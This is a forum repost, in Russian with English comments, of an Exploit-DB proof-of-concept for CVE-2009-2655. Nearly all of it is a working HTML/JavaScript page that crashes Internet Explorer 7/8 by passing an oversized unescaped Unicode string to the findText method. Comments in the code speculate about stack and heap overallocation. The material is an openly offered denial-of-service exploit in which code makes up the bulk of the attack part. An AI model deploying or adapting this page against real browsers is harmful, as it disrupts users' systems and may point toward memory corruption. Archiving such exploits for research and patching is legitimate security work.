Exploit Microsoft Internet Explorer 7/8 - findText Unicode Parsing Crash

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9253
Проверка EDB
  1. Пройдено
Автор
HONG10
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2009-2655
Дата публикации
2009-07-24
HTML:
<meta http-equiv="Context-Type" content="text/html; charset=US-ASCII">
<!--
Contact:[email protected],[email protected]
Title: MS Internet Explorer findText Unicode Parsing error
Vulnerability (mshtml.dll) 
Bug discovered: Hong10 
PoC code: AmesianX & Hong10 
Critical: low 
Impact: MS Internet Explorer 7/8 Crash 
Where: From remote 
Tested Operating System: Windows XP SP3 FULL PATCHED (Korean Language) 

Solution: I don't know.. 

Description: 
 The following bug was tested on the latest version of Internet 
Explorer 7/8. 

by research team NSHC
--> 
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>IE findText crash</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body>
<input type="button" value="exploit" onclick="do_crash();">
Hit the button after ie7/8 crash..
<script>
function do_crash()
{
var o1=document.createElement("input");
o1.type="text";  //or password
o1.id="powerhacker";
o1.value="AAAA";
document.body.appendChild(o1);
var r= o1.createTextRange();
r.findText(unescape("%u4141%u4141%u4141%u4141%u4242%u4242%u4242%u4242%u4343%u4343%u4343%u4343%u4444%u4444%u4444%u4444%u4545%u4545%u4545%u4545"),-1);
//maybe string length allocated stack but over length allocated heap memory
//r.findText(unescape("%u4141%u4141%u4141%u4141%u4242%u4242%u4242%u4242%u4343%u4343%u4343%u4343%u4444%u4444%u4444%u4444%u4545%u4545%u4545%u4545"),-1,131072);
//this code is no crash becase 3 parameter 
}
</script>
</body></html>
<html><body></body></html>

# milw0rm.com [2009-07-24]
 
Источник
www.exploit-db.com

Похожие темы